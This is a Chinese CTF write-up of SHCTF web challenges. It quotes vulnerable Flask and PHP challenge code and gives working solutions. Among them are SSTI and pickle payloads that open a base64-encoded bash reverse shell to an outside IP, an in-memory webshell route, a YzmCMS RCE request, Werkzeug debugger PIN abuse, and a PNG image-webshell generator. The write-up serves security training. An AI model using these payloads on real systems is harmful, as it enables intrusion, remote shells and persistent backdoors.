SHCTF week1-3
最后一周没时间做了,开摆了.
1zflask
robots.txt文件泄露加任意命令执行
import os
import flask
from flask import Flask, request, send_from_directory, send_file
app = Flask(__name__)
@app.route('/api')
def api():
cmd = request.args.get('SSHCTFF', 'ls /')
result = os.popen(cmd).read()
return result
@app.route('/robots.txt')
def static_from_root():
return send_from_directory(app.static_folder,'robots.txt')
@app.route('/s3recttt')
def get_source():
file_path = "app.py"
return send_file(file_path, as_attachment=True)
if __name__ == '__main__':
app.run(debug=True)
MD5 Master
<?php
highlight_file(__file__);
$master = "MD5 master!";
if(isset($_POST["master1"]) && isset($_POST["master2"])){
if($master.$_POST["master1"] !== $master.$_POST["master2"] && md5($master.$_POST["master1"]) === md5($master.$_POST["master2"])){
echo $master . "<br>";
echo file_get_contents('/flag');
}
}
else{
die("master? <br>");
}
使用md5collgen生成指定文件头的两个有哈希碰撞的文件,然后摘除文件头,转换为url编码,post发包即可.
ez_gittt
git泄露,用githacker拉下来git show一下即可.
jvav
一个java的编译器,写个弹shell脚本运行即可.
oppopop
<?php
class SH {
public static $Web = false;
public static $SHCTF = false;
}
class C {
public $p;
public function flag()
{
($this->p)();
}
}
class T{
public $n;
public function __destruct()
{
SH::$Web = true;
echo $this->n;
}
}
class F {
public $o;
public function __toString()
{
SH::$SHCTF = true;
$this->o->flag();
return "其实。。。。,";
}
}
class SHCTF {
public $isyou;
public $flag;
public function __invoke()
{
if (SH::$Web) {
($this->isyou)($this->flag);
echo "小丑竟是我自己呜呜呜~";
} else {
echo "小丑别看了!";
}
}
}
if (isset($_GET['data'])) {
highlight_file(__FILE__);
unserialize(base64_decode($_GET['data']));
} else {
highlight_file(__FILE__);
echo "小丑离我远点!!!";
}
一个简单的php反序列化,链子是直的,没记录
单身十八年的手速
前端调试题,flag在前端base64加密,直接解密即可.
蛐蛐?蛐蛐!
<?php
highlight_file(__FILE__);
if($_GET['ququ'] == 114514 && strrev($_GET['ququ']) != 415411){
if($_POST['ququ']!=null){
$eval_param = $_POST['ququ'];
if(strncmp($eval_param,'ququk1',6)===0){
eval($_POST['ququ']);
}else{
echo("第三关没过去\n");
}
}
echo("第二关没过去\n");
}
else{
echo("第一关没过去\n");
}
strrev用%00截断直接绕过,第二处直接让ququ=ququk1;system('ls');
就可以执行命令.
自助查询
mysql注入,sqlmap一把梭,拿shell查看env即可.
入侵者禁入
from flask import Flask, session, request, render_template_string
app = Flask(__name__)
app.secret_key = '0day_joker'
@app.route('/')
def index():
session['role'] = {
'is_admin': 0,
'flag': 'your_flag_here'
}
with open(__file__, 'r') as file:
code = file.read()
return code
@app.route('/admin')
def admin_handler():
try:
role = session.get('role')
if not isinstance(role, dict):
raise Exception
except Exception:
return 'Without you, you are an intruder!'
if role.get('is_admin') == 1:
flag = role.get('flag') or 'admin'
message = "Oh,I believe in you! The flag is: %s" % flag
return render_template_string(message)
else:
return "Error: You don't have the power!"
if __name__ == '__main__':
app.run('0.0.0.0', port=80)
flasksession伪造,在flask中进行ssti注入.
python3 flask_session_cookie_manager3.py decode -s '0day_joker' -c 'eyJyb2xlIjp7ImZsYWciOiJ5b3VyX2ZsYWdfaGVyZSIsImlzX2FkbWluIjowfX0.ZwhsQw.YPEvA83GUvh-w5ne8CUpK6pNkTk'
python3 flask_session_cookie_manager3.py encode -s '0day_joker' -t "{'role': {'flag': '{{config.__class__.__init__.__globals__[\'os\'].popen(\'cat /flag\').read()}}', 'is_admin': 1}}"
guess_the_number
seed爆破
import flask
import random
from flask import Flask, request, render_template, send_file
app = Flask(__name__)
@app.route('/')
def index():
return render_template('index.html', first_num = first_num)
@app.route('/s0urce')
def get_source():
file_path = "app.py"
return send_file(file_path, as_attachment=True)
@app.route('/first')
def get_first_number():
return str(first_num)
@app.route('/guess')
def verify_seed():
num = request.args.get('num')
if num == str(second_num):
with open("/flag", "r") as file:
return file.read()
return "nonono"
def init():
global seed, first_num, second_num
seed = random.randint(1000000,9999999)
random.seed(seed)
first_num = random.randint(1000000000,9999999999)
second_num = random.randint(1000000000,9999999999)
init()
app.run(debug=True)
写出exp如下
import random
known_first_num = 5803753526 # Replace with the actual known first_num
for seed_candidate in range(1000000, 10000000):
random.seed(seed_candidate)
generated_first_num = random.randint(1000000000, 9999999999)
if generated_first_num == known_first_num:
random.seed(seed_candidate) # Reset seed
random.randint(1000000000, 9999999999) # Skip first_num
second_num = random.randint(1000000000, 9999999999)
print(f"Found seed: {seed_candidate}")
print(f"Second number is: {second_num}")
break
小小cms
YzmCMS版本7.0,存在前台RCE的洞,找个payload直接打.
POST /pay/index/pay_callback.html HTTP/1.1
Host: 210.44.150.15:39810
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 72
out_trade_no[0]=eq&out_trade_no[1]=cat${IFS}/flag&out_trade_no[2]=system
love_flask
from flask import Flask, request, render_template_string
# Flask 2.0.1
# Werkzeug 2.2.2
app = Flask(__name__)
html_template = '''
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Pretty Input Box</title>
<style>
.pretty-input {
width: 100%;
padding: 10px 20px;
margin: 20px 0;
font-size: 16px;
border: 1px solid #ccc;
border-radius: 25px;
box-sizing: border-box;
box-shadow: 0 2px 4px rgba(0, 0, 0, 0.2);
transition: border 0.3s ease-in-out;
}
.pretty-input:focus {
border-color: #4CAF50;
outline: none;
}
.submit-button {
width: 100%;
padding: 10px 20px;
margin: 20px 0;
font-size: 16px;
color: white;
background-color: #4CAF50;
border: none;
border-radius: 25px;
cursor: pointer;
}
.container {
max-width: 300px;
margin: auto;
text-align: center;
}
</style>
</head>
<body>
<div class="container">
<form action="/namelist" method="get">
<input type="text" class="pretty-input" name="name" placeholder="Enter your name...">
<input type="submit" class="submit-button" value="Submit">
</form>
</div>
</body>
</html>
'''
@app.route('/')
def pretty_input():
return render_template_string(html_template)
@app.route('/namelist', methods=['GET'])
def name_list():
name = request.args.get('name')
template = '<h1>Hi, %s.</h1>' % name
rendered_string = render_template_string(template)
if rendered_string:
return 'Success Write your name to database'
else:
return 'Error'
if __name__ == '__main__':
app.run(port=8080)
这里有模板注入,但是无回显,因此只能弹shell
{{config.__class__.__init__.__globals__['os'].popen("bash${IFS}-c${IFS}'{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjMuNTcuMjMuNDAvMTExMSAwPiYx}|{base64,-d}|{bash,-i}'").read()}}
补档一个新的trick,可以利用SSTI来写一个内存马
`{{url_for.__globals__['__builtins__']['eval']("app.add_url_rule('/shell', 'shell', lambda :__import__('os').popen(_request_ctx_stack.top.request.args.get('cmd', 'whoami')).read())",{'_request_ctx_stack':url_for.__globals__['_request_ctx_stack'],'app':url_for.__globals__['current_app']})}}`
通过访问/shell路由即可触发.
MD5 GOD!
给出了源码.
from flask import *
import hashlib, os, random
app = Flask(__name__)
app.config["SECRET_KEY"] = "Th1s_is_5ecr3t_k3y"
salt = os.urandom(16)
def md5(data):
return hashlib.md5(data).hexdigest().encode()
def check_sign(sign, username, msg, salt):
if sign == md5(salt + msg + username):
return True
return False
def getRandom(str_length=16):
"""
生成一个指定长度的随机字符串
"""
random_str =''
base_str ='ABCDEFGHIGKLMNOPQRSTUVWXYZabcdefghigklmnopqrstuvwxyz0123456789'
length =len(base_str) -1
for i in range(str_length):
random_str +=base_str[random.randint(0, length)]
return random_str
users = {}
sign_users = {}
@app.route("/")
def index():
if session.get('sign') == None or session.get('username') == None or session.get('msg') == None:
return redirect("/login")
sign = session.get('sign')
username = session.get('username')
msg = session.get('msg')
if check_sign(sign, username, msg, salt):
sign_users[username.decode()] = 1
return "签到成功"
return redirect("/login")
@app.route("/login", methods=["GET", "POST"])
def login():
if request.method == "POST":
username = request.form.get('username')
password = request.form.get('password')
# print(password)
if username in users and users[username] == password:
session["username"] = username.encode()
session["msg"] = md5(salt + password.encode())
session["sign"] = md5(salt + md5(salt + password.encode()) + username.encode())
return "登陆成功"
else:
return "登陆失败"
else:
return render_template("login.html")
@app.route("/users")
def user():
return json.dumps(sign_users)
@app.route("/flag")
def flag():
for user in users:
if sign_users[user] != 1:
return "flag{杂鱼~}"
return open('/flag', 'r').read()
def init():
global users, sign_users
for _ in range(64):
username = getRandom(8)
pwd = getRandom(16)
users[username] = pwd
sign_users[username] = 0
users["student"] = "student"
sign_users["student"] = 0
init()
分析一下网站的逻辑.首先随机生成了64个用户及其密码.然后又添加了一个用户名和密码都是student的用户.
有一个用户登录页面,可以去进行登录,如果登录成功会返回一个session,可以携带session进行签到.
着重看一下session生成的逻辑和检验的逻辑.
session生成:
session["username"] = username.encode()
session["msg"] = md5(salt + password.encode())
session["sign"] = md5(salt + md5(salt + password.encode()) + username.encode())
session检验:
def check_sign(sign, username, msg, salt):
if sign == md5(salt + msg + username):
return True
return False
那么此时发现了一个问题,就是对于msg来说,知道salt的长度和student用户的password的值,那么可以对msg进行哈希扩展攻击.
写出利用脚本如下
import requests
import re
import subprocess
url = "http://210.44.150.15:33120"
user_url = url + "/users"
login_url = url + "/login"
secret_key = "Th1s_is_5ecr3t_k3y"
prev_pattern = r'\'msg\':\sb\'(.*?)\''
user_pattern = r'"(.*?)"'
sig_pattern = r'predicted sig:\s*(.*)'
msg_pattern = r'student\\x80(\\x[A-Za-z0-9][A-Za-z0-9])*'
data = {
"username": "student",
"password": "student"
}
r = requests.post(url = login_url, data = data)
session = r.cookies.get("session")
fake_msg = subprocess.getoutput("python3 /home/lbz/CTFtools/flask-session-cookie-manager/flask_session_cookie_manager3.py decode -s 'Th1s_is_5ecr3t_k3y' -c '" + session + "'")
prev_msg = re.search(prev_pattern, fake_msg).group(1)
prev_msg = prev_msg.rstrip()
r = requests.get(url = user_url)
matches = re.findall(user_pattern, r.text)
requests.get(url = url, cookies = {"session": session})
for i in matches:
hashpump_cmd = "/home/lbz/CTFtools/HashPump-partialhash-master/hashpump -s " + prev_msg + " -d student -a " + i + " -k 16"
#请自行修改路径
output = subprocess.getoutput(hashpump_cmd)
sig = re.search(sig_pattern, output).group(1)
msg = re.search(msg_pattern, output).group(0)
session_cmd = "python3 /home/lbz/CTFtools/flask-session-cookie-manager/flask_session_cookie_manager3.py encode -s '" + secret_key + "' -t \"{'msg': b'" + msg + "', 'sign': b'" + sig + "', 'username': b'" + i + "'}\""
#请自行修改路径
session = subprocess.getoutput(session_cmd).rstrip()
cookies = {
"session": session
}
headers = {
"Upgrade-Insecure-Requests": "1",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.110 Safari/537.36",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7",
"Accept-Encoding": "gzip, deflate",
"Accept-Language": "zh-CN,zh;q=0.9"
}
r = requests.get(url = url, cookies = cookies, headers = headers)
if "签到成功" in r.text:
print(r.text)
脚本的难度主要是在正则上,其他的地方还是很好懂的.解码student的session,然后拿msg去进行哈希伪造攻击.使用新得到的sig,添加了填充字符student作为msg,以及username去进行session伪造,携带session进行签到即可.
dickle
from flask import Flask, request
import pickle
import base64
import io
BLACKLISTED_CLASSES = [
'subprocess.check_output','builtins.eval','builtins.exec',
'os.system', 'os.popen', 'os.popen2', 'os.popen3', 'os.popen4',
'pickle.load', 'pickle.loads', 'cPickle.load', 'cPickle.loads',
'subprocess.call', 'subprocess.check_call', 'subprocess.Popen',
'commands.getstatusoutput', 'commands.getoutput', 'commands.getstatus',
'pty.spawn', 'posixfile.open', 'posixfile.fileopen',
'__import__','os.spawn*','sh.Command','imp.load_module','builtins.compile'
'eval', 'builtins.execfile', 'compile', 'builtins.open', 'builtins.file', 'os.system',
'os.fdopen', 'os.tmpfile', 'os.fchmod', 'os.fchown', 'os.open', 'os.openpty', 'os.read', 'os.pipe',
'os.chdir', 'os.fchdir', 'os.chroot', 'os.chmod', 'os.chown', 'os.link', 'os.lchown', 'os.listdir',
'os.lstat', 'os.mkfifo', 'os.mknod', 'os.access', 'os.mkdir', 'os.makedirs', 'os.readlink', 'os.remove',
'os.removedirs', 'os.rename', 'os.renames', 'os.rmdir', 'os.tempnam', 'os.tmpnam', 'os.unlink', 'os.walk',
'os.execl', 'os.execle', 'os.execlp', 'os.execv', 'os.execve', 'os.dup', 'os.dup2', 'os.execvp', 'os.execvpe',
'os.fork', 'os.forkpty', 'os.kill', 'os.spawnl', 'os.spawnle', 'os.spawnlp', 'os.spawnlpe', 'os.spawnv',
'os.spawnve', 'os.spawnvp', 'os.spawnvpe', 'pickle.load', 'pickle.loads', 'cPickle.load', 'cPickle.loads',
'subprocess.call', 'subprocess.check_call', 'subprocess.check_output', 'subprocess.Popen',
'commands.getstatusoutput', 'commands.getoutput', 'commands.getstatus', 'glob.glob',
'linecache.getline', 'shutil.copyfileobj', 'shutil.copyfile', 'shutil.copy', 'shutil.copy2', 'shutil.move',
'shutil.make_archive', 'popen2.popen2', 'popen2.popen3', 'popen2.popen4', 'timeit.timeit', 'sys.call_tracing',
'code.interact', 'code.compile_command', 'codeop.compile_command', 'pty.spawn', 'posixfile.open',
'posixfile.fileopen'
]
class SafeUnpickler(pickle.Unpickler):
def find_class(self, module, name):
print(f"module: {module}, name: {name}")
if f"{module}.{name}" in BLACKLISTED_CLASSES:
raise pickle.UnpicklingError("Forbidden class: %s.%s" % (module, name))
return super().find_class(module, name)
app = Flask(__name__)
@app.route("/", methods=["GET", "POST"])
def index():
if request.method == "POST":
encoded_data = request.form["data"]
decoded_data = base64.b64decode(encoded_data)
try:
data_stream = io.BytesIO(decoded_data)
unpickler = SafeUnpickler(data_stream)
result = unpickler.load()
return f"Deserialized data: {list(result)}"
except Exception as e:
return f"Error during deserialization: {str(e)}"
else:
return """
<form method="post">
<label for="data">Enter your serialized data:</label><br>
<textarea id="data" name="data"></textarea><br>
<input type="submit" value="Submit">
</form>
"""
if __name__ == "__main__":
app.run(port=1111)
一道pickle反序列化的题,黑名单重写了SafeUnpickler.以前的都是白名单的,这里是黑名单,问题就出在这里.
python的os包的底层实现是和操作系统相关的.在windows下是通过nt实现的,在linux下是通过posix实现的.也就是说他虽然黑名单禁用了os.system,但是如果在linux下对os.system进行序列化,实际序列化的是posix,在反序列化的时候不会受到os.system的屏蔽.
写出脚本在linux下运行
import pickle
import os
import base64
class Exploit():
def __reduce__(self):
return (os.system, ("bash${IFS}-c${IFS}'{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjMuNTcuMjMuNDAvMTExMSAwPiYx}|{base64,-d}|{bash,-i}'",))
exploit = Exploit()
serialized = pickle.dumps(exploit)
encoded = base64.b64encode(serialized)
print(encoded)
hacked_website
Typecho 1.2.1,找到了一个rc的cve漏洞,然而出题人对邮箱格式进行了加固防御,利用不了.
/admin后台登录,弱密码爆破结果admin/qwer1234
在控制台功能中找到了外观修改页面,路由为:http://210.44.150.15:31882/admin/theme-editor.php
.能够直接修改index.php的部分php代码.直接写个马进去,蚁剑连拿flag.
顰
一道flask算pin的特殊利用.
算pin的部分没啥可说的.
直接访问/console提示:The browser (or proxy) sent a request that this server could not understand.
这是由于flask在debug模式下禁止不在安全名单上的host进行访问.
我们伪造http头部如下即可正常访问/console
GET /console HTTP/1.1
Host: 127.0.0.1:26421
Referer: http://210.44.150.15:26421/console
然而我们此时拿到的这个console是不可以直接去输入pin进行交互的,直接输入pin会提示网络问题.
我们看到返回的html中包含以下部分
<script>
var CONSOLE_MODE = true,
EVALEX = true,
EVALEX_TRUSTED = true,
SECRET = "OfYUepPjnjLyMX9EnOi1";
</script>
此时可以携带secret参数去手动访问console路由对我们的pin进行一个认证.
__debugger__=yes&cmd=pinauth&pin=546-131-104&s=OfYUepPjnjLyMX9EnOi1
如果认证成功了的话会返回一个cookie
HTTP/1.1 200 OK
Server: Werkzeug/3.0.4 Python/3.10.15
Date: Thu, 24 Oct 2024 13:02:02 GMT
Content-Type: application/json
Content-Length: 34
Set-Cookie: __wzdb96f6fc656ac9ee385ea=1729774922|4e48264b18f5; HttpOnly; Path=/; SameSite=Strict
Connection: close
{"auth": true, "exhausted": false}
得到了一个cookie,这个cookie就是在console中携带的cookie,我们携带cookie即可执行命令.
__debugger__=yes&cmd=__import__('os').system('dir')&frm=0&s=OfYUepPjnjLyMX9EnOi1
拜师之旅·番外
一道文件上传的题,提供了文件上传和文件读取的功能(注意一般的是不提供文件读取的功能的.
观察到进行文件读取的时候url如下
http://210.44.150.15:41460/view.php?image=/upload/1734887938.png
这个view.php一定是实现了某种奇怪的逻辑.猜测有文件包含漏洞.尝试伪协议以及路径遍历,都没成功,然后想到了如果图片马被文件包含了的话是可以直接执行命令的...
然后下载图片发现传上去的内容和下载下来的内容并不相同,这里存在一个图片的二次渲染问题.
直接那存的png二次渲染脚本去打.
<?php
$p = array(0xa3, 0x9f, 0x67, 0xf7, 0x0e, 0x93, 0x1b, 0x23,
0xbe, 0x2c, 0x8a, 0xd0, 0x80, 0xf9, 0xe1, 0xae,
0x22, 0xf6, 0xd9, 0x43, 0x5d, 0xfb, 0xae, 0xcc,
0x5a, 0x01, 0xdc, 0x5a, 0x01, 0xdc, 0xa3, 0x9f,
0x67, 0xa5, 0xbe, 0x5f, 0x76, 0x74, 0x5a, 0x4c,
0xa1, 0x3f, 0x7a, 0xbf, 0x30, 0x6b, 0x88, 0x2d,
0x60, 0x65, 0x7d, 0x52, 0x9d, 0xad, 0x88, 0xa1,
0x66, 0x44, 0x50, 0x33);
$img = imagecreatetruecolor(32, 32);
for ($y = 0; $y < sizeof($p); $y += 3) {
$r = $p[$y];
$g = $p[$y+1];
$b = $p[$y+2];
$color = imagecolorallocate($img, $r, $g, $b);
imagesetpixel($img, round($y / 3), 0, $color);
}
imagepng($img,'1.png'); //要修改的图片的路径
/* 木马内容
<?$_GET[0]($_POST[1]);?>
*/
?>
生成了一个php片马,可以在访问图片的时候直接去执行命令,然后以文本形式查看图片得到回显.